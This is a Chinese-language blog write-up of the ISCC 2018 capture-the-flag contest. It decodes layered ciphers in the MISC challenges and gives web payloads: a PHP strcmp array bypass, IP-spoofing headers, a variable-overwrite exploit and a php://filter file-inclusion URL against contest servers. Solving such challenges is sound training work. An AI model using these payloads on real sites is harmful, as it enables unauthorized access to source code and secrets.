<!DOCTYPE html>
<html>
<head>
  <meta charset="utf-8">
  

  
  <title>ISCC2018 wp | Hexo</title>
  <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
  <meta name="description" content="MISC1.有趣的ISCC">
<meta property="og:type" content="article">
<meta property="og:title" content="ISCC2018 wp">
<meta property="og:url" content="http://yoursite.com/2018/05/25/ISCC2018-wp/index.html">
<meta property="og:site_name" content="Hexo">
<meta property="og:description" content="MISC1.有趣的ISCC">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="http://yoursite.com/2018/05/25/ISCC2018-wp/ISCC2018-wp/1.png">
<meta property="og:image" content="http://yoursite.com/2018/05/25/ISCC2018-wp/ISCC2018-wp/2.png">
<meta property="og:image" content="http://yoursite.com/2018/05/25/ISCC2018-wp/ISCC2018-wp/3.png">
<meta property="og:image" content="http://yoursite.com/2018/05/25/ISCC2018-wp/ISCC2018-wp/4.png">
<meta property="og:image" content="http://yoursite.com/2018/05/25/ISCC2018-wp/ISCC2018-wp/5.png">
<meta property="og:image" content="http://yoursite.com/2018/05/25/ISCC2018-wp/ISCC2018-wp/6.png">
<meta property="og:image" content="http://yoursite.com/2018/05/25/ISCC2018-wp/ISCC2018-wp/7.png">
<meta property="og:image" content="http://yoursite.com/2018/05/25/ISCC2018-wp/ISCC2018-wp/9.png">
<meta property="og:image" content="http://yoursite.com/2018/05/25/ISCC2018-wp/ISCC2018-wp/10.png">
<meta property="og:image" content="http://yoursite.com/2018/05/25/ISCC2018-wp/ISCC2018-wp/11.png">
<meta property="og:image" content="http://yoursite.com/2018/05/25/ISCC2018-wp/ISCC2018-wp/12.png">
<meta property="og:image" content="http://yoursite.com/2018/05/25/ISCC2018-wp/ISCC2018-wp/13.png">
<meta property="og:image" content="http://yoursite.com/2018/05/25/ISCC2018-wp/ISCC2018-wp/14.png">
<meta property="og:image" content="http://yoursite.com/2018/05/25/ISCC2018-wp/ISCC2018-wp/15.png">
<meta property="og:image" content="http://yoursite.com/2018/05/25/ISCC2018-wp/ISCC2018-wp/16.png">
<meta property="og:image" content="http://yoursite.com/2018/05/25/ISCC2018-wp/ISCC2018-wp/17.png">
<meta property="og:image" content="http://yoursite.com/2018/05/25/ISCC2018-wp/ISCC2018-wp/18.png">
<meta property="og:image" content="http://yoursite.com/2018/05/25/ISCC2018-wp/ISCC2018-wp/19.png">
<meta property="og:image" content="http://yoursite.com/2018/05/25/ISCC2018-wp/ISCC2018-wp/20.png">
<meta property="og:image" content="http://yoursite.com/2018/05/25/ISCC2018-wp/ISCC2018-wp/21.png">
<meta property="og:image" content="http://yoursite.com/2018/05/25/ISCC2018-wp/ISCC2018-wp/22.png">
<meta property="og:image" content="http://yoursite.com/2018/05/25/ISCC2018-wp/ISCC2018-wp/23.png">
<meta property="og:image" content="http://yoursite.com/2018/05/25/ISCC2018-wp/ISCC2018-wp/24.png">
<meta property="og:image" content="http://yoursite.com/2018/05/25/ISCC2018-wp/ISCC2018-wp/25.png">
<meta property="og:image" content="http://yoursite.com/2018/05/25/ISCC2018-wp/ISCC2018-wp/27.png">
<meta property="og:image" content="http://yoursite.com/2018/05/25/ISCC2018-wp/ISCC2018-wp/28.png">
<meta property="og:image" content="http://yoursite.com/2018/05/25/ISCC2018-wp/ISCC2018-wp/29.png">
<meta property="og:image" content="http://yoursite.com/2018/05/25/ISCC2018-wp/ISCC2018-wp/30.png">
<meta property="og:image" content="http://yoursite.com/2018/05/25/ISCC2018-wp/ISCC2018-wp/31.png">
<meta property="og:image" content="http://yoursite.com/2018/05/25/ISCC2018-wp/ISCC2018-wp/32.png">
<meta property="og:image" content="http://yoursite.com/2018/05/25/ISCC2018-wp/ISCC2018-wp/33.png">
<meta property="article:published_time" content="2018-05-25T09:13:55.000Z">
<meta property="article:modified_time" content="2019-12-30T10:31:51.364Z">
<meta property="article:author" content="John Doe">
<meta property="article:tag" content="writeup">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="http://yoursite.com/2018/05/25/ISCC2018-wp/ISCC2018-wp/1.png">
  
    <link rel="alternate" href="/atom.xml" title="Hexo" type="application/atom+xml">
  
  
    <link rel="icon" href="/favicon.png">
  
  
    <link href="//fonts.googleapis.com/css?family=Source+Code+Pro" rel="stylesheet" type="text/css">
  
  
<link rel="stylesheet" href="/css/style.css">

<meta name="generator" content="Hexo 4.2.0"></head>

<body>
  <div id="container">
    <div id="wrap">
      <header id="header">
  <div id="banner"></div>
  <div id="header-outer" class="outer">
    <div id="header-title" class="inner">
      <h1 id="logo-wrap">
        <a href="/" id="logo">Hexo</a>
      </h1>
      
    </div>
    <div id="header-inner" class="inner">
      <nav id="main-nav">
        <a id="main-nav-toggle" class="nav-icon"></a>
        
          <a class="main-nav-link" href="/">Home</a>
        
          <a class="main-nav-link" href="/archives">Archives</a>
        
      </nav>
      <nav id="sub-nav">
        
          <a id="nav-rss-link" class="nav-icon" href="/atom.xml" title="RSS Feed"></a>
        
        <a id="nav-search-btn" class="nav-icon" title="Search"></a>
      </nav>
      <div id="search-form-wrap">
        <form action="//google.com/search" method="get" accept-charset="UTF-8" class="search-form"><input type="search" name="q" class="search-form-input" placeholder="Search"><button type="submit" class="search-form-submit">&#xF002;</button><input type="hidden" name="sitesearch" value="http://yoursite.com"></form>
      </div>
    </div>
  </div>
</header>
      <div class="outer">
        <section id="main"><article id="post-ISCC2018-wp" class="article article-type-post" itemscope itemprop="blogPost">
  <div class="article-meta">
    <a href="/2018/05/25/ISCC2018-wp/" class="article-date">
  <time datetime="2018-05-25T09:13:55.000Z" itemprop="datePublished">2018-05-25</time>
</a>
    
  </div>
  <div class="article-inner">
    
    
      <header class="article-header">
        
  
    <h1 class="article-title" itemprop="name">
      ISCC2018 wp
    </h1>
  

      </header>
    
    <div class="article-entry" itemprop="articleBody">
      
        <h2 id="MISC"><a href="#MISC" class="headerlink" title="MISC"></a>MISC</h2><h4 id="1-有趣的ISCC"><a href="#1-有趣的ISCC" class="headerlink" title="1.有趣的ISCC"></a>1.有趣的ISCC</h4><p><img src="ISCC2018-wp/1.png" alt=""></p>
<a id="more"></a>
<p>下载下来之后是一个图片，把后缀名改为txt之后打开看到文件末尾有一串特殊编码，<br><img src="ISCC2018-wp/2.png" alt=""><br>整理一下之后，老司机一看就知道这是HTML编码，网上有HTML的在线解码，解码后可以看到解码内容为</p>
<pre><code>\u0066\u006c\u0061\u0067\u007b\u0069\u0073\u0063\u0063\u0020\u0069\u0073\u0020\u0066\u0075\u006e\u007d
</code></pre><p>然后将这一串编码再用unicode进行解码即可得到</p>
<pre><code>flag{iscc is fun}
</code></pre><p>推荐一个解码网站：<br><a href="http://tool.chinaz.com/tools/unicode.aspx" target="_blank" rel="noopener" title="在线解码">http://tool.chinaz.com/tools/unicode.aspx</a></p>
<h4 id="2-What-is-that"><a href="#2-What-is-that" class="headerlink" title="2.What is that"></a>2.What is that</h4><p><img src="ISCC2018-wp/3.png" alt=""><br>打开后仍然是下载附件，下载下来也是个图片，<br><img src="ISCC2018-wp/4.png" alt=""><br>起初没什么头绪，不过，看到它的手指指着下边就想到是不是下边有东西，联想到这题是MISC的，就试试更改分辨率，看看下边是否有隐藏的东西，将图片的宽调成与长相等即可看到下边的内容<br><img src="ISCC2018-wp/5.png" alt=""></p>
<p>附上flag:</p>
<pre><code>Flag={_Welcome_To_ISCC_2018_}
</code></pre><h3 id="3-Where-is-the-flag"><a href="#3-Where-is-the-flag" class="headerlink" title="3.Where is the flag"></a>3.Where is the flag</h3><p>下载下来是个图片，各种图片隐写的尝试都没什么用，抱着尝试的心思用firework cs5打开，发现这个图片后边还有隐藏的图片，全部分开后是9块小的图片，都是二维码，把9块小图片拼接在一起之后是一个完整的二维码，拿微信扫一扫就可以得到flag<br><img src="ISCC2018-wp/6.png" alt=""></p>
<pre><code>flag{a332b700-3621-11e7-a53b-6807154a58cf}
</code></pre><h3 id="4-一只猫的心思"><a href="#4-一只猫的心思" class="headerlink" title="4.一只猫的心思"></a>4.一只猫的心思</h3><p>下载下来是一个图片，先用foremost抽离一下，发现有隐藏的东西，查看一下文件的二进制编码，我用的是010Editor，这里需要脑补一下，正常的jpg结尾都是FF D9的，图片查看器会忽视jpg结束符之后的内容，因此FF D9后边的东西就是这个题隐藏的数据，我们把它复制下来，另存为doc文档，打开后得到一串很像乱码的中文</p>
<pre><code>名西三陵帝焰数诵诸山众參哈瑟倒陰捨劫奉惜逝定雙月奉倒放足即闍重号貧老诵夷經友利普过孕北至花令藐灯害蒙能羅福羅夢开雙禮琉德护慈積寫阿璃度戏便通故西故敬于瑟行雙知宇信在礙哈数及息闍殺陵游盧槃药諦慈灯究幽灯豆急彌貧豆親诵梭量树琉敬精者楞来西陰根五消夢众羅持造彌六师彌怖精僧璃夫薩竟祖方夢訶橋經文路困如牟憐急尼念忧戏輸教乾楞能敬告树来楞殊倒哈在紛除亿茶涅根輸持麼阿空瑟稳住濟号他方牟月息盡即来通貧竟怖如槃精老盡恤及游薩戏师毒兄宝下行普鄉释下告劫惜进施盡豆告心蒙紛信胜东蒙求帝金量礙故弟帝普劫夜利除積众老陀告沙師尊尼捨惜三依老蒙守精于排族祖在师利寫首念凉梭妙經栗穆愛憐孝粟尊醯造解住時刚槃宗解牟息在量下恐教众智焰便醯除寂想虚中顛老弥诸持山諦月真羅陵普槃下遠涅能开息灯和楞族根羅宝戒药印困求及想月涅能进至贤金難殊毘瑟六毘捨薩槃族施帝遠念众胜夜夢各万息尊薩山哈多皂诵盡药北及雙栗师幽持牟尼隸姪遠住孕寂以舍精花羅界去住勒排困多閦呼皂難于焰以栗婦愛闍多安逝告槃藐矜竟孕彌弟多者精师寡寫故璃舍各亦方特路茶豆積梭求号栗怖夷凉在顛豆胜住虚解鄉姪利琉三槃以舍劫鄉陀室普焰于鄉依朋故能劫通
</code></pre><p>其实只是特殊编码的字符，放到与佛论禅中解码<br><a href="http://www.keyfc.net/bbs/tools/tudoucode.aspx" target="_blank" rel="noopener">http://www.keyfc.net/bbs/tools/tudoucode.aspx</a><br>把我们的密文放到下边的框里，前边要加上 <code>如是我闻：</code>，然后点击参悟佛所言的真意，即可得到一串密文。<br><img src="ISCC2018-wp/7.png" alt=""></p>
<pre><code>523156615245644E536C564856544E565130354B553064524D6C524E546B4A56535655795645644F5530524857544A4553553943566B644A4D6C524E546C7052523155795645744F536C5248515670555330354452456456576B524854554A585231457956554E4F51305A4855544E4553303153566B64424D6C524A546B7058527A525A5245744F576C5A4854544A5554553554513063304E46524C54564A5652316B795255744F51305A4856544E5554564661566B6C464D6B5252546B70595231557A5245394E516C5A4856544A555355354B566B644E5756524E5455705752316B7A5255564F55305248566B465553564A4356306C4E4D6C524E546B4A565231557952453152556C564A56544A455555354B5530644E5756525054554A56523030795645314F516C5A4857544A4553303143566B64464D305648546B744352314A425645744F576C5A4855544A4651303543566B64564D6B524854554A555230557A52454E4F536C644855544A5554553543566B645A4D6B564A546C4E445231566152456C52576C5A4855544A5553303544516B64564D6C524C54564A55523045795245314F556C4A4856544E455355354B56556C564D6B564E546B70535230315A52457452536C564951544A555455354B565564535156524A54564A575230457956456C4E576C46485454525553303143566B6446576C564A54544A46
</code></pre><p>这个一看就是十六进制转换了，推荐一个在线十六进制转换的网站：<br><a href="https://www.bejson.com/convert/ox2str/" target="_blank" rel="noopener">https://www.bejson.com/convert/ox2str/</a> </p>
<p>转换之后的结果就是这样：<br><img src="ISCC2018-wp/9.png" alt=""></p>
<pre><code>R1VaREdNSlVHVTNVQ05KU0dRMlRNTkJVSVUyVEdOU0RHWTJESU9CVkdJMlRNTlpRR1UyVEtOSlRHQVpUS05DREdVWkRHTUJXR1EyVUNOQ0ZHUTNES01SVkdBMlRJTkpXRzRZREtOWlZHTTJUTU5TQ0c0NFRLTVJVR1kyRUtOQ0ZHVTNUTVFaVklFMkRRTkpYR1UzRE9NQlZHVTJUSU5KVkdNWVRNTUpWR1kzRUVOU0RHVkFUSVJCV0lNMlRNTkJVR1UyRE1RUlVJVTJEUU5KU0dNWVRPTUJVR00yVE1OQlZHWTJES01CVkdFM0VHTktCR1JBVEtOWlZHUTJFQ05CVkdVMkRHTUJUR0UzRENOSldHUTJUTU5CVkdZMkVJTlNDR1VaRElRWlZHUTJUS05DQkdVMlRLTVJUR0EyRE1OUlJHVTNESU5KVUlVMkVNTkpSR01ZREtRSlVIQTJUTU5KVUdSQVRJTVJWR0EyVElNWlFHTTRUS01CVkdFWlVJTTJF
</code></pre><p>得到的东西一看就是base64了，解码一下又是一串编码，<br><img src="ISCC2018-wp/10.png" alt=""><br>    GUZDGMJUGU3UCNJSGQ2TMNBUIU2TGNSDGY2DIOBVGI2TMNZQGU2TKNJTGAZTKNCDGUZDGMBWGQ2UCNCFGQ3DKMRVGA2TINJWG4YDKNZVGM2TMNSCG44TKMRUGY2EKNCFGU3TMQZVIE2DQNJXGU3DOMBVGU2TINJVGMYTMMJVGY3EENSDGVATIRBWIM2TMNBUGU2DMQRUIU2DQNJSGMYTOMBUGM2TMNBVGY2DKMBVGE3EGNKBGRATKNZVGQ2ECNBVGU2DGMBTGE3DCNJWGQ2TMNBVGY2EINSCGUZDIQZVGQ2TKNCBGU2TKMRTGA2DMNRRGU3DINJUIU2EMNJRGMYDKQJUHA2TMNJUGRATIMRVGA2TIMZQGM4TKMBVGEZUIM2E</p>
<p>分析它是base32编码，继续解码<br><img src="ISCC2018-wp/11.png" alt=""><br>    5231457A5245644E536C6448525670555530354C5230645A4E4652505456705753566B7952464E4E576C5A485756705554553161566B6C5A4D6C5644546B4E485231704356456450516C5A4A57544A4554303161564564564D6B524C54554A555230466156454E4F51305A4856544A425054303950513D3D</p>
<p>然后再用十六进制：<br>    R1EzREdNSldHRVpUU05LR0dZNFRPTVpWSVkyRFNNWlZHWVpUTU1aVklZMlVDTkNHR1pCVEdPQlZJWTJET01aVEdVMkRLTUJUR0FaVENOQ0ZHVTJBPT09PQ==</p>
<p>再用base64：</p>
<pre><code>GQ3DGMJWGEZTSNKGGY4TOMZVIY2DSMZVGYZTMMZVIY2UCNCGGZBTGOBVIY2DOMZTGU2DKMBTGAZTCNCFGU2A====
</code></pre><p>再用base32：</p>
<pre><code>463161395F69735F493563635F5A4F6C385F4733545030314E54
</code></pre><p>再十六进制：</p>
<pre><code>F1a9_is_I5cc_ZOl8_G3TP01NT
</code></pre><p>哇，终于出来了，这个出题人也是够有耐心的，这个题出的也是有点无语，几种编码方式反反复复的搞。</p>
<h3 id="5-凯撒十三世"><a href="#5-凯撒十三世" class="headerlink" title="5.凯撒十三世"></a>5.凯撒十三世</h3><pre><code>ebdgc697g95w3
</code></pre><p>既然是凯撒十三世，没啥好说的网上的rot13在线解码<br><a href="http://www.qqxiuzi.cn/bianma/ROT5-13-18-47.php" target="_blank" rel="noopener">http://www.qqxiuzi.cn/bianma/ROT5-13-18-47.php</a></p>
<p>解密后得到：</p>
<pre><code>roqtp697t95j3
</code></pre><p>这个真的是快让我崩溃了，知道的编码方式都试了也没试出来<br>问了一下大佬怎么搞，知道了有一种叫键盘密码的东西<br><img src="ISCC2018-wp/12.png" alt=""><br>键盘解密就是键盘上每个按键的明文对应该按键右下边的按键<br>例如：R对应F  O对应L  Q对应A  。。。。<br>自己对照着用键盘解密后明文是</p>
<pre><code>flag:yougotme
</code></pre><h3 id="6-重重谍影"><a href="#6-重重谍影" class="headerlink" title="6.重重谍影"></a>6.重重谍影</h3><p>这个题也稍微有点烦，打开网页得到一串密文，一看就是base64</p>
<pre><code>Vm0wd2QyVkZOVWRXV0doVlYwZG9WVll3WkRSV2JGbDNXa1JTVjAxWGVGWlZNakExVjBaS2RHVkljRnBXVm5CUVZqQmtTMUl4VG5OaFJtUlhaV3RHTkZkWGRHdFRNVXB6V2toV2FsSnNjRmhhVjNoaFYxWmFjMWt6YUZSTlZtdzBWVEo0YzJGR1NuTlhiR2hYWVd0d2RsUnRlR3RqYkdSMFVteFdUbFp0ZHpCV2EyTXhVekZSZUZkc1ZsZGhlbXhoVm01d1IyTldjRVZTYlVacVZtdHdlbGRyVlRWVk1ERldZMFZ3VjJKR2NIWlpWRXBIVWpGT1dXSkhhRlJTVlhCWFZtMDFkMUl3TlhOVmJGcFlZbGhTV1ZWcVFURlRWbEY0VjIxR2FGWnNjSGxaYWs1clZqSkdjbUo2UWxwV1JWcDZWbXBHVDJNeGNFaGpSazVZVWxWd1dWWnRNVEJXTVUxNFdrVmtWbUpHV2xSWlZFNVRWVVpzYzFadVpGUmlSbHBaVkZaU1ExWlhSalpTYTJSWFlsaENVRll3V21Gak1XUnpZVWRHVTFKV2NGRldha0poV1ZkU1YxWnVTbEJXYldoVVZGUktiMDB4V25OYVJFSm9UVlpXTlZaSE5VOVdiVXB5WTBaYVdtRXhjRE5aTW5oVFZqRmFkRkpzWkU1V2JGa3dWbXhrTUdFeVJraFRiRnBYWVd4d1dGWnFUbE5YUmxsNVRWVmFiRkp0VW5wWlZWcFhZVlpLZFZGdWJGZGlXRUpJV1ZSS1QxWXhTblZWYlhoVFlYcFdWVmRYZUZOamF6RkhWMjVTYWxKWVVrOVZiVEUwVjBaYVNFNVZPVmRXYlZKS1ZWZDRhMWRzV2taWGEzaFhUVlp3V0ZwR1pFOVRSVFZZWlVkc1UyRXpRbHBXYWtvd1lURkplRmR1U2s1V1ZscHdWVzB4VTFac1duUk5WazVPVFZkU1dGZHJWbXRoYXpGeVRsVndWbFl6YUZoV2FrWmhZekpPUjJKR1pGTmxhMVYzVjJ0U1IyRXhUa2RWYmtwb1VtdEtXRmxzWkc5a2JHUllaRVprYTJKV1ducFhhMXB2Vkd4T1NHRklRbFZXTTJoTVZqQmFZVk5GTlZaa1JscFRZbFpLU0ZaSGVGWmxSbHBYVjJ0YVQxWldTbFpaYTFwM1dWWndWMXBHWkZSU2EzQXdXVEJWTVZZeVNuSlRWRUpYWWtad2NsUnJXbHBsUmxweVdrWm9hVkpzY0ZsWFYzUnJWVEZaZUZkdVVtcGxhMHB5VkZaYVMxZEdXbk5oUnpsWVVteHNNMWxyVWxkWlZscFhWbGhvVjFaRldtaFdha3BQVWxaU2MxcEhhRTVpUlc4eVZtdGFWMkV4VVhoYVJXUlVZa2Q0Y1ZWdGRIZGpSbHB4VkcwNVZsWnRVbGhXVjNSclYyeGFjMk5GYUZkaVIyaHlWbTB4UzFaV1duSlBWbkJwVW14d2IxZHNWbUZoTWs1elZtNUtWV0pHV2s5V2JHaERVMVphY1ZKdE9XcE5WbkJaVld4b2IxWXlSbk5UYldoV1lURmFhRlJVUm1GamJIQkhWR3hTVjJFelFqVldSM2hoWVRGU2RGTnJXbXBTVjFKWVZGWmFTMUpHYkhGU2JrNVlVbXR3ZVZkcldtdGhWa2w1WVVjNVYxWkZTbWhhUkVaaFZqRldjMWRzWkZoU01taFFWa1phWVdReFNuTldXR3hyVWpOU2IxVnRkSGRXYkZwMFpVaE9XbFpyY0ZsV1YzQlBWbTFXY2xkdGFGWmlXRTE0Vm0xNGExWkdXbGxqUms1U1ZURldObFZyVGxabGJFcENTbFJPUlVwVVRrVSUzRA==
</code></pre><p>解密后仍然是base64，这时候末尾有url编码，需要用url解码，反正就是base64和url来回用，解到最后不能解的时候就是下面这样：<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">U2FsdGVkX183BPnBd50ynIRM3o8YLmwHaoi8b8QvfVdFHCEwG9iwp4hJHznrl7d4</span><br><span class="line">B5rKClEyYVtx6uZFIKtCXo71fR9Mcf6b0EzejhZ4pnhnJOl+zrZVlV0T9NUA+u1z</span><br><span class="line">iN+jkpb6ERH86j7t45v4Mpe+j1gCpvaQgoKC0Oaa5kc&#x3D;</span><br></pre></td></tr></table></figure></p>
<p>U2FsdGVkX1开头的，一看就是AES了，网上的在线解密工具：<br><a href="http://tool.oschina.net/encrypt/" target="_blank" rel="noopener">http://tool.oschina.net/encrypt/</a><br>得到的结果是：</p>
<pre><code>答案就是后面这句但已加密
缽娑遠呐者若奢顛悉呐集梵提梵蒙夢怯倒耶哆般究有栗
</code></pre><p><img src="ISCC2018-wp/13.png" alt=""></p>
<p>一看就知道，仍然是与佛论禅，网址上边已经给了，拿去解密一下：</p>
<p><img src="ISCC2018-wp/14.png" alt=""></p>
<pre><code>flag:   把我复制走
</code></pre><h3 id="7-暴力XX不可取"><a href="#7-暴力XX不可取" class="headerlink" title="7.暴力XX不可取"></a>7.暴力XX不可取</h3><p>下载下来是个压缩包，解压需要密码，既然已经说了暴力破解不可取，那就别想着用暴力破解了，放到binwalk里面跑一下发现有个flag.txt文档<br><img src="ISCC2018-wp/15.png" alt=""><br>把它抽出来看到一串密文，</p>
<pre><code>vfppjrnerpbzvat
</code></pre><p>熟悉的人一看就知道是rot加密了，但是不知道是几，没关系，全部来一遍<br>，都试了一遍之后发现用rot13得到的最顺，flag就是它啦：</p>
<pre><code>isccwearecoming
</code></pre><h3 id="8-秘密电报"><a href="#8-秘密电报" class="headerlink" title="8.秘密电报"></a>8.秘密电报</h3><p>下载下来后是一串密文：</p>
<pre><code>ABAAAABABBABAAAABABAAABAAABAAABAABAAAABAAAABA
</code></pre><p>这个题就是看你的积累是不是够丰富了，我一开始看到就不知道是什么，问了大佬才明白有一种加密叫培根密码<br>这里附上解密网址：</p>
<p><a href="https://netair.xyz/tools/%E5%9F%B9%E6%A0%B9%E5%AF%86%E7%A0%81%E5%8A%A0%E5%AF%86%E8%A7%A3%E5%AF%86.html" target="_blank" rel="noopener">https://netair.xyz/tools/%E5%9F%B9%E6%A0%B9%E5%AF%86%E7%A0%81%E5%8A%A0%E5%AF%86%E8%A7%A3%E5%AF%86.html</a></p>
<p>解密后得到：</p>
<pre><code>ILIKEISCC
ilikeiscc
</code></pre><p><img src="ISCC2018-wp/16.png" alt=""><br>两个都试一试发现flag是小写</p>
<h2 id="Web"><a href="#Web" class="headerlink" title="Web"></a>Web</h2><h3 id="1-比较数字大小"><a href="#1-比较数字大小" class="headerlink" title="1.比较数字大小"></a>1.比较数字大小</h3><p>题目提示：只要比服务器上的数字大就可以了</p>
<p>打开后给了一个提交框，输入数字试一试只能输3位，最大也就是999，这时候提交仍然显示数字太小，做这个题有两个方法：</p>
<pre><code>1.抓包，利用burpsuite抓包后，修改数值，这时候可以输入任意位数，多输几个9就可以了，然后提交就会得到flag
2.修改网页信息，按F12可以查看页面元素，这时候点一下定位按钮，把鼠标放到提交框上就会显示提交框的信息，然后修改一下限制的位数，再提交数字就可以随便就输入了。
</code></pre><h3 id="2-WEB01"><a href="#2-WEB01" class="headerlink" title="2.WEB01"></a>2.WEB01</h3><p>打开后直接给了源码：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php </span><br><span class="line">highlight_file(&#39;2.php&#39;); </span><br><span class="line">$flag&#x3D;&#39;&#123;***************&#125;&#39;; </span><br><span class="line">if (isset($_GET[&#39;password&#39;])) &#123;   </span><br><span class="line">    if (strcmp($_GET[&#39;password&#39;], $flag) &#x3D;&#x3D; 0)   </span><br><span class="line">        die(&#39;Flag: &#39;.$flag);   </span><br><span class="line">    else   </span><br><span class="line">        print &#39;Invalid password&#39;;   </span><br><span class="line">&#125;   </span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure>
<p>PHP弱类型学web的人都知道，strcmp函数比较的时候如果传入的是数组，则该函数无法处理，就会返回0<br>所以直接GET传入password数组即可<br>给出payload：</p>
<pre><code>http://118.190.152.202:8003/?password[]=
</code></pre><p>得到flag:</p>
<pre><code>Flag:ISCC{iscc_ef3w5r5tw_5rg5y6s3t3}
</code></pre><h3 id="3-本地的诱惑"><a href="#3-本地的诱惑" class="headerlink" title="3.本地的诱惑"></a>3.本地的诱惑</h3><p>题目既然已经给了提示那就用burpsuite抓个包，修改一下包里的内容，加入一句话：<br>    X-Forwarded-For: 127.0.0.1<br>这样就行了，当然这是正规做法。<br>但是由于题目已经炸了，直接查看源码就可以看到flag<br><img src="ISCC2018-wp/17.png" alt=""></p>
<pre><code>key is ISCC{^&amp;*(UIHKJjkadshf}
</code></pre><h3 id="4-你能跨过去么"><a href="#4-你能跨过去么" class="headerlink" title="4.你能跨过去么"></a>4.你能跨过去么</h3><p>题目说如果你对XSS了解就能做出来，打开后首先看到一串BASE64的编码<br><img src="ISCC2018-wp/18.png" alt=""><br>把中间的BASE64编码复制出来，拿到网上解码一下</p>
<pre><code>ADwAcwBjAHIAaQBwAHQAPgBhAGwAZQByAHQAKAAiAGsAZQB5ADoALwAlAG4AcwBmAG8AYwB1AHMAWABTAFMAdABlAHMAdAAlAC8AIgApADwALwBzAGMAcgBpAHAAdAA
</code></pre><p><img src="ISCC2018-wp/19.png" alt=""><br>虽然有一部分无法识别的，但是没关系把无法识别的去掉可以得到我们想要的东西：</p>
<pre><code>&lt;script&gt;alert(&quot;key:/%nsfocusXSStest%/&quot;)&lt;/script&gt;
</code></pre><p>把key的内容复制放到提交框里边，</p>
<pre><code>/%nsfocusXSStest%/
</code></pre><p>提交便可得到弹窗：<br><img src="ISCC2018-wp/20.png" alt=""></p>
<pre><code>flag{HellOWorld}
</code></pre><h3 id="5-web03-为什么这么简单啊"><a href="#5-web03-为什么这么简单啊" class="headerlink" title="5.web03 为什么这么简单啊"></a>5.web03 为什么这么简单啊</h3><p><img src="ISCC2018-wp/21.png" alt=""></p>
<p>这个题刚开始没看清楚是需要从<code>http://edu.xss.tv</code>进入，而不是要进入这个网页，做这个题只需要抓个包，然后修改包里的两个内容：</p>
<pre><code>X-Forwarded-For: 110.110.110.110
Referer: http://edu.xss.tv
</code></pre><p>然后发送这个包就进入第二关了<br><img src="ISCC2018-wp/22.png" alt=""></p>
<p>不知道哪里有密码，查看一下页面的源码，看到有一个<code>password.js</code><br><img src="ISCC2018-wp/23.png" alt=""></p>
<p>访问一下该页面得到了一串BASE64编码<br><img src="ISCC2018-wp/24.png" alt=""><br>BASE64解码一下：<br><img src="ISCC2018-wp/25.png" alt=""><br>看到解码出来的东西不要慌，把里面无法识别的内容去掉可以得到我们要的东西：<br>    <script>alert(“password:xinyiji.com”)</script></p>
<p>那么密码就是：<code>xinyiji.com</code>        把它提交到第二关的提交框内就可以得到flag</p>
<h3 id="6-web6-有个文件忘记删了"><a href="#6-web6-有个文件忘记删了" class="headerlink" title="6.web6 有个文件忘记删了"></a>6.web6 有个文件忘记删了</h3><p>打开后只有一个页面，上边显示：flag is here<br>各种文件泄露尝试之后发现有个隐藏文件：<code>index.php.txt</code><br>访问一下得到网页的源码</p>
<pre><code>&lt;?php
include &quot;flag.php&quot;;
if ($_SERVER[&quot;REQUEST_METHOD&quot;] != &quot;POST&quot;)
    die(&quot;flag is here&quot;);
if (!isset($_POST[&quot;flag&quot;]) )
    die($_403);
foreach ($_GET as $k =&gt; $v){
    $$k = $$v;
}
foreach ($_POST as $k =&gt; $v){
    $$k = $v;
}
if ( $_POST[&quot;flag&quot;] !== $flag )
    die($_403);
echo &quot;flag: &quot;. $flag . &quot;\n&quot;;
die($_200);
?&gt;
</code></pre><p>代码审计之后很明显是变量覆盖：<br>首先GET传入<code>_200=flag</code>，这样在第一个foreach完成之后变量flag的值就被赋值给了变量_200，然后POST传入flag=1，这样便能保证在第二个foreach里边我们传入的变量flag的值与此时的_200的相等，然后下边的if条件便不成立，代码便会执行到最后输出变量_200的值，而之前我们已经把flag的值赋值给了变量_200，因此输出的变量_200的值便是flag:</p>
<pre><code>ISCC{taolu2333333....}
</code></pre><h3 id="7-你能绕过么"><a href="#7-你能绕过么" class="headerlink" title="7.你能绕过么"></a>7.你能绕过么</h3><p>哇，这个题目是真的坑啊，第一眼看上去都以为是注入题，各种注入都试了仍然没有头绪，以为是自己太菜，有哪种自己不知道的注入方法，问了大佬才知道这个题考察的是伪协议，（太菜.png）</p>
<p>由于题目过滤了php，因此用伪协议时需要用大小写混淆</p>
<p>直接payload：</p>
<pre><code>http://118.190.152.202:8008/index.php?f=Php://filter/read=convert.base64-encode/resource=index&amp;id=1
</code></pre><p>得到网页的源码：</p>
<pre><code>&lt;?php
    #ISCC{LFIOOOOOOOOOOOOOO}
    if(isset($_GET[&apos;f&apos;])){
        if(strpos($_GET[&apos;f&apos;],&quot;php&quot;) !== False){
            die(&quot;error...&quot;);
        }
        else{
            include($_GET[&apos;f&apos;] . &apos;.php&apos;);
        }
    }
?&gt;
</code></pre><p>flag就在源码里边了：</p>
<pre><code>ISCC{LFIOOOOOOOOOOOOOO}
</code></pre><h3 id="8-web02"><a href="#8-web02" class="headerlink" title="8.web02"></a>8.web02</h3><p>进去后直接显示：错误你的IP不是本机IP！<br>老套路：抓包改包，加上<code>X-Forwarded-For: 127.0.0.1</code>发现我们的万金油竟然不好使了。</p>
<p>可能时网页的检测机制检测的不是这个IP了，网上搜一搜伪装IP的方法发现还有另一个：client-ip<br>这里脑补一下：client-ip是客户端IP地址，X-Forwarded-For是从哪个网页来的那个IP地址，因此这个题抓包把客户端IP内容加上即可。</p>
<pre><code>Client-ip: 127.0.0.1
</code></pre><p>提交后即可得到flag:</p>
<pre><code>ISCC{iscc_059eeb8c0c33eb62}
</code></pre><h3 id="9-请PING我的IP，看你能PING通么"><a href="#9-请PING我的IP，看你能PING通么" class="headerlink" title="9.请PING我的IP，看你能PING通么"></a>9.请PING我的IP，看你能PING通么</h3><p>进去后发现没什么东西，既然让PING它的IP，那就试一试给它个IP参数</p>
<p><img src="ISCC2018-wp/27.png" alt=""></p>
